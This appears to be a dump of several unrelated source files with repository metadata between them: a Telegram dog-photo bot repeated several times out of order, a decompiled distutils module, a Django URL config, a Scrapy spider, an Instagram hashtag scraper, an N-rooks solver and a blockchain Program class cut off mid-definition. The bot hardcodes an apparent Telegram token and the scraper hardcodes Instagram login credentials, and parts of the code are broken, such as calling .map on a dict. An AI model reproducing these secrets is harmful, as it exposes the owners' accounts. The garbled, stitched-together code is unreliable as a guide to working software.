bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
|
[
"ritesh@emerald.pink"
] |
ritesh@emerald.pink
|
f89dacf4aac0ae3fdb0ad9f2963d35ff0258e14c
|
e68a40e90c782edae9d8f89b827038cdc69933c4
|
/res_bw/scripts/common/lib/distutils/cmd.py
|
d9027a45765ad9ad67fde32fcc7aac035fc0ee26
|
[] |
no_license
|
webiumsk/WOT-0.9.16
|
2486f8b632206b992232b59d1a50c770c137ad7d
|
71813222818d33e73e414e66daa743bd7701492e
|
refs/heads/master
| 2021-01-10T23:12:33.539240
| 2016-10-11T21:00:57
| 2016-10-11T21:00:57
| 70,634,922
| 0
| 0
| null | null | null | null |
WINDOWS-1250
|
Python
| false
| false
| 14,573
|
py
|
# 2016.10.11 22:19:24 Střední Evropa (letní čas)
# Embedded file name: scripts/common/Lib/distutils/cmd.py
"""distutils.cmd
Provides the Command class, the base class for the command classes
in the distutils.command package.
"""
__revision__ = '$Id$'
import sys, os, re
from distutils.errors import DistutilsOptionError
from distutils import util, dir_util, file_util, archive_util, dep_util
from distutils import log
class Command():
"""Abstract base class for defining command classes, the "worker bees"
of the Distutils. A useful analogy for command classes is to think of
them as subroutines with local variables called "options". The options
are "declared" in 'initialize_options()' and "defined" (given their
final values, aka "finalized") in 'finalize_options()', both of which
must be defined by every command class. The distinction between the
two is necessary because option values might come from the outside
world (command line, config file, ...), and any options dependent on
other options must be computed *after* these outside influences have
been processed -- hence 'finalize_options()'. The "body" of the
subroutine, where it does all its work based on the values of its
options, is the 'run()' method, which must also be implemented by every
command class.
"""
sub_commands = []
def __init__(self, dist):
"""Create and initialize a new Command object. Most importantly,
invokes the 'initialize_options()' method, which is the real
initializer and depends on the actual command being
instantiated.
"""
from distutils.dist import Distribution
if not isinstance(dist, Distribution):
raise TypeError, 'dist must be a Distribution instance'
if self.__class__ is Command:
raise RuntimeError, 'Command is an abstract class'
self.distribution = dist
self.initialize_options()
self._dry_run = None
self.verbose = dist.verbose
self.force = None
self.help = 0
self.finalized = 0
return
def __getattr__(self, attr):
if attr == 'dry_run':
myval = getattr(self, '_' + attr)
if myval is None:
return getattr(self.distribution, attr)
else:
return myval
else:
raise AttributeError, attr
return
def ensure_finalized(self):
if not self.finalized:
self.finalize_options()
self.finalized = 1
def initialize_options(self):
"""Set default values for all the options that this command
supports. Note that these defaults may be overridden by other
commands, by the setup script, by config files, or by the
command-line. Thus, this is not the place to code dependencies
between options; generally, 'initialize_options()' implementations
are just a bunch of "self.foo = None" assignments.
This method must be implemented by all command classes.
"""
raise RuntimeError, 'abstract method -- subclass %s must override' % self.__class__
def finalize_options(self):
"""Set final values for all the options that this command supports.
This is always called as late as possible, ie. after any option
assignments from the command-line or from other commands have been
done. Thus, this is the place to code option dependencies: if
'foo' depends on 'bar', then it is safe to set 'foo' from 'bar' as
long as 'foo' still has the same value it was assigned in
'initialize_options()'.
This method must be implemented by all command classes.
"""
raise RuntimeError, 'abstract method -- subclass %s must override' % self.__class__
def dump_options(self, header = None, indent = ''):
from distutils.fancy_getopt import longopt_xlate
if header is None:
header = "command options for '%s':" % self.get_command_name()
self.announce(indent + header, level=log.INFO)
indent = indent + ' '
for option, _, _ in self.user_options:
option = option.translate(longopt_xlate)
if option[-1] == '=':
option = option[:-1]
value = getattr(self, option)
self.announce(indent + '%s = %s' % (option, value), level=log.INFO)
return
def run(self):
"""A command's raison d'etre: carry out the action it exists to
perform, controlled by the options initialized in
'initialize_options()', customized by other commands, the setup
script, the command-line, and config files, and finalized in
'finalize_options()'. All terminal output and filesystem
interaction should be done by 'run()'.
This method must be implemented by all command classes.
"""
raise RuntimeError, 'abstract method -- subclass %s must override' % self.__class__
def announce(self, msg, level = 1):
"""If the current verbosity level is of greater than or equal to
'level' print 'msg' to stdout.
"""
log.log(level, msg)
def debug_print(self, msg):
"""Print 'msg' to stdout if the global DEBUG (taken from the
DISTUTILS_DEBUG environment variable) flag is true.
"""
from distutils.debug import DEBUG
if DEBUG:
print msg
sys.stdout.flush()
def _ensure_stringlike(self, option, what, default = None):
val = getattr(self, option)
if val is None:
setattr(self, option, default)
return default
else:
if not isinstance(val, str):
raise DistutilsOptionError, "'%s' must be a %s (got `%s`)" % (option, what, val)
return val
def ensure_string(self, option, default = None):
"""Ensure that 'option' is a string; if not defined, set it to
'default'.
"""
self._ensure_stringlike(option, 'string', default)
def ensure_string_list(self, option):
r"""Ensure that 'option' is a list of strings. If 'option' is
currently a string, we split it either on /,\s*/ or /\s+/, so
"foo bar baz", "foo,bar,baz", and "foo, bar baz" all become
["foo", "bar", "baz"].
"""
val = getattr(self, option)
if val is None:
return
else:
if isinstance(val, str):
setattr(self, option, re.split(',\\s*|\\s+', val))
else:
if isinstance(val, list):
ok = 1
for element in val:
if not isinstance(element, str):
ok = 0
break
else:
ok = 0
if not ok:
raise DistutilsOptionError, "'%s' must be a list of strings (got %r)" % (option, val)
return
def _ensure_tested_string(self, option, tester, what, error_fmt, default = None):
val = self._ensure_stringlike(option, what, default)
if val is not None and not tester(val):
raise DistutilsOptionError, ("error in '%s' option: " + error_fmt) % (option, val)
return
def ensure_filename(self, option):
"""Ensure that 'option' is the name of an existing file."""
self._ensure_tested_string(option, os.path.isfile, 'filename', "'%s' does not exist or is not a file")
def ensure_dirname(self, option):
self._ensure_tested_string(option, os.path.isdir, 'directory name', "'%s' does not exist or is not a directory")
def get_command_name(self):
if hasattr(self, 'command_name'):
return self.command_name
else:
return self.__class__.__name__
def set_undefined_options(self, src_cmd, *option_pairs):
"""Set the values of any "undefined" options from corresponding
option values in some other command object. "Undefined" here means
"is None", which is the convention used to indicate that an option
has not been changed between 'initialize_options()' and
'finalize_options()'. Usually called from 'finalize_options()' for
options that depend on some other command rather than another
option of the same command. 'src_cmd' is the other command from
which option values will be taken (a command object will be created
for it if necessary); the remaining arguments are
'(src_option,dst_option)' tuples which mean "take the value of
'src_option' in the 'src_cmd' command object, and copy it to
'dst_option' in the current command object".
"""
src_cmd_obj = self.distribution.get_command_obj(src_cmd)
src_cmd_obj.ensure_finalized()
for src_option, dst_option in option_pairs:
if getattr(self, dst_option) is None:
setattr(self, dst_option, getattr(src_cmd_obj, src_option))
return
def get_finalized_command(self, command, create = 1):
"""Wrapper around Distribution's 'get_command_obj()' method: find
(create if necessary and 'create' is true) the command object for
'command', call its 'ensure_finalized()' method, and return the
finalized command object.
"""
cmd_obj = self.distribution.get_command_obj(command, create)
cmd_obj.ensure_finalized()
return cmd_obj
def reinitialize_command(self, command, reinit_subcommands = 0):
return self.distribution.reinitialize_command(command, reinit_subcommands)
def run_command(self, command):
"""Run some other command: uses the 'run_command()' method of
Distribution, which creates and finalizes the command object if
necessary and then invokes its 'run()' method.
"""
self.distribution.run_command(command)
def get_sub_commands(self):
"""Determine the sub-commands that are relevant in the current
distribution (ie., that need to be run). This is based on the
'sub_commands' class attribute: each tuple in that list may include
a method that we call to determine if the subcommand needs to be
run for the current distribution. Return a list of command names.
"""
commands = []
for cmd_name, method in self.sub_commands:
if method is None or method(self):
commands.append(cmd_name)
return commands
def warn(self, msg):
log.warn('warning: %s: %s\n' % (self.get_command_name(), msg))
def execute(self, func, args, msg = None, level = 1):
util.execute(func, args, msg, dry_run=self.dry_run)
def mkpath(self, name, mode = 511):
dir_util.mkpath(name, mode, dry_run=self.dry_run)
def copy_file(self, infile, outfile, preserve_mode = 1, preserve_times = 1, link = None, level = 1):
"""Copy a file respecting verbose, dry-run and force flags. (The
former two default to whatever is in the Distribution object, and
the latter defaults to false for commands that don't define it.)"""
return file_util.copy_file(infile, outfile, preserve_mode, preserve_times, not self.force, link, dry_run=self.dry_run)
def copy_tree(self, infile, outfile, preserve_mode = 1, preserve_times = 1, preserve_symlinks = 0, level = 1):
"""Copy an entire directory tree respecting verbose, dry-run,
and force flags.
"""
return dir_util.copy_tree(infile, outfile, preserve_mode, preserve_times, preserve_symlinks, not self.force, dry_run=self.dry_run)
def move_file(self, src, dst, level = 1):
"""Move a file respecting dry-run flag."""
return file_util.move_file(src, dst, dry_run=self.dry_run)
def spawn(self, cmd, search_path = 1, level = 1):
"""Spawn an external command respecting dry-run flag."""
from distutils.spawn import spawn
spawn(cmd, search_path, dry_run=self.dry_run)
def make_archive(self, base_name, format, root_dir = None, base_dir = None, owner = None, group = None):
return archive_util.make_archive(base_name, format, root_dir, base_dir, dry_run=self.dry_run, owner=owner, group=group)
def make_file(self, infiles, outfile, func, args, exec_msg = None, skip_msg = None, level = 1):
"""Special case of 'execute()' for operations that process one or
more input files and generate one output file. Works just like
'execute()', except the operation is skipped and a different
message printed if 'outfile' already exists and is newer than all
files listed in 'infiles'. If the command defined 'self.force',
and it is true, then the command is unconditionally run -- does no
timestamp checks.
"""
if skip_msg is None:
skip_msg = 'skipping %s (inputs unchanged)' % outfile
if isinstance(infiles, str):
infiles = (infiles,)
elif not isinstance(infiles, (list, tuple)):
raise TypeError, "'infiles' must be a string, or a list or tuple of strings"
if exec_msg is None:
exec_msg = 'generating %s from %s' % (outfile, ', '.join(infiles))
if self.force or dep_util.newer_group(infiles, outfile):
self.execute(func, args, exec_msg, level)
else:
log.debug(skip_msg)
return
class install_misc(Command):
"""Common base class for installing some files in a subdirectory.
Currently used by install_data and install_scripts.
"""
user_options = [('install-dir=', 'd', 'directory to install the files to')]
def initialize_options(self):
self.install_dir = None
self.outfiles = []
return
def _install_dir_from(self, dirname):
self.set_undefined_options('install', (dirname, 'install_dir'))
def _copy_files(self, filelist):
self.outfiles = []
if not filelist:
return
self.mkpath(self.install_dir)
for f in filelist:
self.copy_file(f, self.install_dir)
self.outfiles.append(os.path.join(self.install_dir, f))
def get_outputs(self):
return self.outfiles
# okay decompyling c:\Users\PC\wotsources\files\originals\res_bw\scripts\common\lib\distutils\cmd.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2016.10.11 22:19:24 Střední Evropa (letní čas)
|
[
"info@webium.sk"
] |
info@webium.sk
|
35b080e015f21cdb9155cddd726966872085a254
|
81b7d4f68586e9831ec4f1d1825b13ab9bcdad71
|
/p8.py
|
56e3eab8a4c450fb8965cd0d4ebec34846ddea8d
|
[] |
no_license
|
jeanpaulpitman/sandbox
|
99a23b091ab6e56e557f6bebdf754145d65f5d26
|
5a8e88c522c43eff583929ffce80ad3e559eff46
|
refs/heads/master
| 2021-01-16T21:33:32.378547
| 2017-11-01T04:24:58
| 2017-11-01T04:24:58
| 100,237,373
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 95
|
py
|
s = "Welcome to the Jungle"
new_s = ""
for letter in s:
new_s += (letter * 2)
print(new_s)
|
[
"jeanpaul.pitman@my.jcu.edu.au"
] |
jeanpaul.pitman@my.jcu.edu.au
|
c3b7367762bfbce704395f5ea3cf7a4ec1c20c53
|
93b9097c9e0f3d156878d41d1e3110a0c1fb4fe5
|
/smarthome/urls.py
|
cd58e1e4a5d6d828f703a3944e6430ede7c8fe27
|
[] |
no_license
|
japaqonik/py_smarthome
|
acf4f0fd139545ef64e512888723809d4df684ef
|
9b2f8a66982c309be7de34e699106b983d9afa73
|
refs/heads/master
| 2022-12-25T00:39:21.045400
| 2020-09-28T09:17:33
| 2020-09-28T09:17:33
| 299,213,459
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 943
|
py
|
"""smarthome URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from pages.views import home_view, login_view, logout_view
urlpatterns = [
path('logout/', logout_view, name='logout'),
path('login/', login_view, name='login'),
path('', home_view, name='home'),
path('admin/', admin.site.urls),
]
|
[
"japaqonik@gmail.com"
] |
japaqonik@gmail.com
|
69b260836cb53c44836fb3a6e5c2660b38909c73
|
efa7b95174e8d50e2031598fccb944e0a066216e
|
/JobWeb/spiders/NeiTui.py
|
acf4aa989858c3a201e1abc16052fde66cd61715
|
[] |
no_license
|
wucunfeng/rainbowHorse
|
864eee6062da64fd6fef945ebdccd5a6bd951ec0
|
b4b3b2821de235a425526c1f8515f80c29d3c518
|
refs/heads/master
| 2020-05-09T09:48:33.747855
| 2019-06-07T10:59:22
| 2019-06-07T10:59:22
| 181,017,301
| 2
| 0
| null | 2019-04-12T13:49:26
| 2019-04-12T13:49:26
| null |
UTF-8
|
Python
| false
| false
| 981
|
py
|
#utf-8
from scrapy import Request
from scrapy.spider import Spider
from JobWeb.items import NeiTui
from JobWeb.Requesthead import NeiTuiHeaders
class NeiTuiSpider(Spider):
name = 'NeiTui'
def start_requests(self):
url = 'http://www.neitui.me/?name=job&handle=lists'
yield Request(url = url, headers = NeiTuiHeaders)
def parse(self, response):
item = NeiTui()
NEITUI = response.xpath('.//div[@class = "media"]')
for neitui in NEITUI:
item['NeiTuiTitle'] = neitui.xpath('.//div[@class = "mt5 clearfix"]/a/text()').extract()[0]
item['NeiTuiCompany'] = neitui.xpath('.//div[@class = "grey mt5"]/span/a/text()').extract()[0]
yield item
next_Link = response.xpath('.//div[@class = "text-center"]/nav/ul/li/a[@aria-label = "Next"]/@href').extract()
if next_Link:
next_Link = 'http://www.neitui.me/'+next_Link[0]
yield Request(next_Link,headers=NeiTuiHeaders)
|
[
"wu1998102@gmail.com"
] |
wu1998102@gmail.com
|
9a00be30afc2143a70c3c5158321bf0b654b9a46
|
d4cd3d06039b1a1f2d8dd624414263bfe031fceb
|
/docs/soft/maixpy3/replace_metadata.py
|
316c4ed0ee4c4de7beb238af83390666c9d6844a
|
[
"MIT"
] |
permissive
|
NTestZ/sipeed_wiki
|
7c1e2029ded979829e0e748ccb0b876ef3e374af
|
1f5fd7dcadbcec952a260213911419028eb59006
|
refs/heads/main
| 2023-07-07T12:43:31.854451
| 2021-08-07T09:29:16
| 2021-08-07T09:29:16
| 393,743,071
| 0
| 0
|
MIT
| 2021-08-07T17:03:09
| 2021-08-07T17:03:08
| null |
UTF-8
|
Python
| false
| false
| 1,209
|
py
|
import os, sys
from glob import glob
import re
path = sys.argv[1]
file_dirs = glob(os.path.join(path, "**"), recursive=True)
for path in file_dirs:
if os.path.isdir(path):
continue
if not path.endswith(".md"):
continue
print("deal:", path)
with open(path, encoding="utf-8") as f:
content = f.read()
title = ""
def re_replace_sharp_h1(c):
global title
title = c[0][2:-1]
return ""
def re_replace_h1(c):
global title
title = c[0].split("\n")[0]
return ""
# find title from:
# title
# ===
content = re.sub(r'.*\n===.*\n', re_replace_h1, content, flags=re.MULTILINE)
if not title:
# find tile from:
# # title
content = re.sub(r'^# .*\n', re_replace_sharp_h1, content)
header = '''---
title: {}
keywords: maixpy, k210, AIOT, 边缘计算
desc: maixpy doc: {}
---
'''.format(title, title)
content = header + content
with open(path, "w", encoding="utf-8") as f:
f.write(content)
|
[
"a495094740@gmail.com"
] |
a495094740@gmail.com
|
2f389251120f5b55b7e13abdeec5e4a4cf1d2fca
|
70e32629fef6a060448d2fb19b2c24abd84647b0
|
/app1.py
|
4385646e5111363599313e429c19e9e206b16ea9
|
[] |
no_license
|
9500guswn/1.--
|
a9be6fda38c8f12d52bdcbecc56d59919c9691a6
|
8bb73c687d0ef6c2cd3f493ddf3f513c5cdd0514
|
refs/heads/master
| 2022-12-12T10:26:13.825647
| 2020-09-01T02:33:17
| 2020-09-01T02:33:17
| 289,879,192
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,559
|
py
|
from selenium import webdriver
import time
import warnings
from bs4 import BeautifulSoup
from pymongo import MongoClient # pymongo를 임포트 하기(패키지 인스톨 먼저 해야겠죠?)
client = MongoClient('localhost', 27017) # mongoDB는 27017 포트로 돌아갑니다.
db = client.project
import lxml
# from lxml import etree
import re
driver = webdriver.Chrome('chromedriver.exe')
# 3초 기다리는 함수(implicitly_wait)
driver.implicitly_wait(3)
# 경고메시지 제거 패키지
warnings.filterwarnings(action='ignore')
def get_content(driver):
html=driver.page_source
soup = BeautifulSoup(html, 'html.parser')
# soup=BeautifulSoup(html,lxml)
# print(soup)
# reviews=soup.select('div.EZdmt > div > div > div')
# # body > div._2dDPU.CkGkG > div.zZYga > div > article > div.eo2As > div.EtaWk > ul > div > li > div > div > div.C4VMK > span
# # tag_list=[]
# for tags in reviews:
# hashtag=tags.select_one('a > div > div > img')['src']
# # body > div._2dDPU.CkGkG > div.zZYga > div > article > div.eo2As > div.EtaWk > ul > div > li > div > div > div.C4VMK > span > a: nth - child(
# # # 10)
# print(hashtag)
for i in soup.find_all("a", class_="xil3i") :
print(i.text[1:])
pageString = driver.page_source
print(pageString)
# try:
#
# content=soup.select('div.C4VMK > span')[0].text
# except:
# content = ' '
# tags = re.findall(r'#[^\s#,\\]+', content) #
driver.get('https://www.instagram.com/accounts/login/')
time.sleep(3)
# driver.find_element_by_xpath('//*[@id="loginForm"]/div/div[1]/div/label/input').send_keys("01050083203")
# driver.find_element_by_xpath('//*[@id="loginForm"]/div/div[2]/div/label/input').send_keys("eogkrtod12")
driver.find_element_by_name('username').send_keys('01050083203')
driver.find_element_by_name('password').send_keys('eogkrtod12')
time.sleep(3)
# 로그인버튼 누르기
driver.find_element_by_xpath('//*[@id="loginForm"]/div/div[3]/button').click()
# 버튼누르기
driver.find_element_by_xpath('//*[@id="react-root"]/section/main/div/div/div/section/div/button').click()
# 버튼 누르기
driver.find_element_by_xpath('/html/body/div[4]/div/div/div/div[3]/button[2]').click()
time.sleep(3)
driver.get('https://www.instagram.com/explore/tags/수원돈까스맛집')
time.sleep(3)
# 일치하는 CSS 선택자가있는 첫 번째 요소가 반환됩니다.
first=driver.find_element_by_css_selector ( "div._9AhH0")
first.click()
time.sleep(3)
result=[]
target=10
|
[
"9500guswn@gmail.com"
] |
9500guswn@gmail.com
|
10f222d7fb4fa9cb062fe04ba157b94d6fd37828
|
752adab52f583fb148ad813c89ac325e5a1f604e
|
/Elements Of AI/RooksAndQueens/nrooks-2.py
|
a95986f445af031ebfb008c74227d2ada94132b6
|
[] |
no_license
|
nawazkh/MSCS-IUB
|
45283db78f1a91985a30c50c42211772f7934c5e
|
43f1799f18432af4f6d33efed6cf653af840033b
|
refs/heads/master
| 2021-10-20T16:08:35.705016
| 2019-02-28T18:42:59
| 2019-02-28T18:42:59
| 103,451,289
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,421
|
py
|
#!/usr/bin/env python
# nrooks.py : Solve the N-Rooks problem!
# D. Crandall, 2016
# Updated by Zehua Zhang, 2017
#
# The N-rooks problem is: Given an empty NxN chessboard, place N rooks on the board so that no rooks
# can take any other, i.e. such that no two rooks share the same row or column.
import sys
import time
# Count # of pieces in given row
def count_on_row(board, row):
# print "count_on_row"
strtr = sum( board[row] )
# print strtr
return strtr
# Count # of pieces in given column
def count_on_col(board, col):
# print "count_on_col"
tes = sum( [ row[col] for row in board ] )
# print tes
return tes
# Count total # of pieces on board
def count_pieces(board):
# print "count_pieces"
strtemp = sum([ sum(row) for row in board ] )
# print strtemp
return strtemp
# Return a string with the board rendered in a human-friendly format
def printable_board(board):
# print "printable_board"
return "\n".join([ " ".join([ "R" if col else "_" for col in row ]) for row in board])
def modified_printable_board2(board):
printRow = ""
r = 0
c = 0
for row in board:
c = 0
for col in row:
if(r == rowExclude):
if(c == colExclude):
printRow += "X "
else:
if(col == 0):
printRow += "_ "
else:
printRow += "R "
else:
if(col == 0):
printRow += "_ "
else:
printRow += "R "
c += 1
r += 1
printRow += "\n"
return printRow
# Add a piece to the board at the given position, and return a new board (doesn't change original)
def add_piece(board, row, col):
# print board
#print row
#print col
#print "add_piece"
stringTemp = board[0:row] + [board[row][0:col] + [1,] + board[row][col+1:]] + board[row+1:]
#print stringTemp
return stringTemp
# Get list of successors of given board state
def successors2(board):
# print "successors"
# print board
tempList=[]
itemsOnBoard = count_pieces(board)
itemsOnRow = 0
for r in range(0,N):
itemsOnRow = count_on_row(board,r)
for c in range(0,N):
if(board[r][c] == 1):#implies if 1 is at [1,1] do not re add onto it
pass
else: #add it to the fringe
if(itemsOnBoard <= N-1 ):# to remove adding of more than 3 items
#print "in new else" , count_pieces(board)#if the item is present a row, exclude that row
if( itemsOnRow == 0):#if the item not present in that row, then add item
if(count_on_col(board,c) == 0):#if item not present in that column, then add item
#print "count_on_row(board,r)",count_on_row(board,r),"count_on_col(board,c)",count_on_col(board,c)
if(rowExclude < 0 or colExclude < 0):
tempList.append(add_piece(board, r, c))
else:
if(r == rowExclude and c == colExclude):
pass
else:
tempList.append(add_piece(board, r, c))
#tempList.append(add_piece(board, r, c))
else:# ignore expansion if the column already has an item
pass
else:#if an item already there at row r, ignore expansion
pass
else:
print "excluding expanding of state space if the number of items are more than N"
pass
return tempList
def successors(board):
# print "successors()"
return [ add_piece(board, r, c) for r in range(0, N) for c in range(0,N) ]
# check if board is a goal state
def is_goal(board):
# print "is_goal"
return count_pieces(board) == N and \
all( [ count_on_row(board, r) <= 1 for r in range(0, N) ] ) and \
all( [ count_on_col(board, c) <= 1 for c in range(0, N) ] )
# Solve n-rooks!
def solve(initial_board):
# print "solve"
fringe = [initial_board]
# print fringe
while len(fringe) > 0:
#print "hi"
#print fringe
for s in successors2( fringe.pop() ):
#print "fringe popped"
#print s
#print "---"
if is_goal(s):
return(s)
fringe.append(s)
# print fringe
return False
# This is N, the size of the board. It is passed through command line arguments.
N = int(sys.argv[1])
rowExclude = int(sys.argv[2]) - 1
colExclude = int(sys.argv[3]) - 1
#print "Initial params set"
# The board is stored as a list-of-lists. Each inner list is a row of the board.
# A zero in a given square indicates no piece, and a 1 indicates a piece.
initial_board = [[0]*N]*N
#print ("Starting from initial board:\n" + modified_printable_board2(initial_board) + "\n\nLooking for solution...\n")
tempTime = int(time.time()*1000000)
solution = solve(initial_board)
print (modified_printable_board2(solution) if solution else "Sorry, no solution found. :(")
tempTime2 = int(time.time()*1000000)
print "Time Elapsed in milliseconds for",N," rooks using stack",tempTime2 - tempTime
|
[
"nawazkh@Nawazs-MacBook-Pro.local"
] |
nawazkh@Nawazs-MacBook-Pro.local
|
8679df74503c5e8225b1f6736be8fc111122959d
|
2c95e0f7bb3f977306f479d5c99601ab1d5c61f2
|
/olive/types/blockchain_format/program.py
|
991578faa53a9376f9b547c5acec541b38be843a
|
[
"Apache-2.0"
] |
permissive
|
Olive-blockchain/Olive-blockchain-CLI
|
d62444f8456467f8105531178d2ae53d6e92087d
|
8c4a9a382d68fc1d71c5b6c1da858922a8bb8808
|
refs/heads/main
| 2023-07-19T03:51:08.700834
| 2021-09-19T16:05:10
| 2021-09-19T16:05:10
| 406,045,499
| 0
| 0
|
Apache-2.0
| 2021-09-19T16:05:10
| 2021-09-13T16:20:38
|
Python
|
UTF-8
|
Python
| false
| false
| 7,275
|
py
|
import io
from typing import List, Set, Tuple
from clvm import KEYWORD_FROM_ATOM, KEYWORD_TO_ATOM, SExp
from clvm import run_program as default_run_program
from clvm.casts import int_from_bytes
from clvm.EvalError import EvalError
from clvm.operators import OP_REWRITE, OPERATOR_LOOKUP
from clvm.serialize import sexp_from_stream, sexp_to_stream
from clvm_rs import STRICT_MODE, deserialize_and_run_program2, serialized_length
from clvm_tools.curry import curry, uncurry
from olive.types.blockchain_format.sized_bytes import bytes32
from olive.util.hash import std_hash
from .tree_hash import sha256_treehash
def run_program(
program,
args,
max_cost,
operator_lookup=OPERATOR_LOOKUP,
pre_eval_f=None,
):
return default_run_program(
program,
args,
operator_lookup,
max_cost,
pre_eval_f=pre_eval_f,
)
INFINITE_COST = 0x7FFFFFFFFFFFFFFF
class Program(SExp):
"""
A thin wrapper around s-expression data intended to be invoked with "eval".
"""
@classmethod
def parse(cls, f) -> "Program":
return sexp_from_stream(f, cls.to)
def stream(self, f):
sexp_to_stream(self, f)
@classmethod
def from_bytes(cls, blob: bytes) -> "Program":
f = io.BytesIO(blob)
result = cls.parse(f) # type: ignore # noqa
assert f.read() == b""
return result
def to_serialized_program(self) -> "SerializedProgram":
return SerializedProgram.from_bytes(bytes(self))
def __bytes__(self) -> bytes:
f = io.BytesIO()
self.stream(f) # type: ignore # noqa
return f.getvalue()
def __str__(self) -> str:
return bytes(self).hex()
def get_tree_hash(self, *args: List[bytes32]) -> bytes32:
"""
Any values in `args` that appear in the tree
are presumed to have been hashed already.
"""
return sha256_treehash(self, set(args))
def run_with_cost(self, max_cost: int, args) -> Tuple[int, "Program"]:
prog_args = Program.to(args)
cost, r = run_program(self, prog_args, max_cost)
return cost, Program.to(r)
def run(self, args) -> "Program":
cost, r = self.run_with_cost(INFINITE_COST, args)
return r
def curry(self, *args) -> "Program":
cost, r = curry(self, list(args))
return Program.to(r)
def uncurry(self) -> Tuple["Program", "Program"]:
r = uncurry(self)
if r is None:
return self, self.to(0)
return r
def as_int(self) -> int:
return int_from_bytes(self.as_atom())
def as_atom_list(self) -> List[bytes]:
"""
Pretend `self` is a list of atoms. Return the corresponding
python list of atoms.
At each step, we always assume a node to be an atom or a pair.
If the assumption is wrong, we exit early. This way we never fail
and always return SOMETHING.
"""
items = []
obj = self
while True:
pair = obj.pair
if pair is None:
break
atom = pair[0].atom
if atom is None:
break
items.append(atom)
obj = pair[1]
return items
def __deepcopy__(self, memo):
return type(self).from_bytes(bytes(self))
EvalError = EvalError
def _tree_hash(node: SExp, precalculated: Set[bytes32]) -> bytes32:
"""
Hash values in `precalculated` are presumed to have been hashed already.
"""
if node.listp():
left = _tree_hash(node.first(), precalculated)
right = _tree_hash(node.rest(), precalculated)
s = b"\2" + left + right
else:
atom = node.as_atom()
if atom in precalculated:
return bytes32(atom)
s = b"\1" + atom
return bytes32(std_hash(s))
def _serialize(node) -> bytes:
if type(node) == SerializedProgram:
return bytes(node)
else:
return SExp.to(node).as_bin()
class SerializedProgram:
"""
An opaque representation of a clvm program. It has a more limited interface than a full SExp
"""
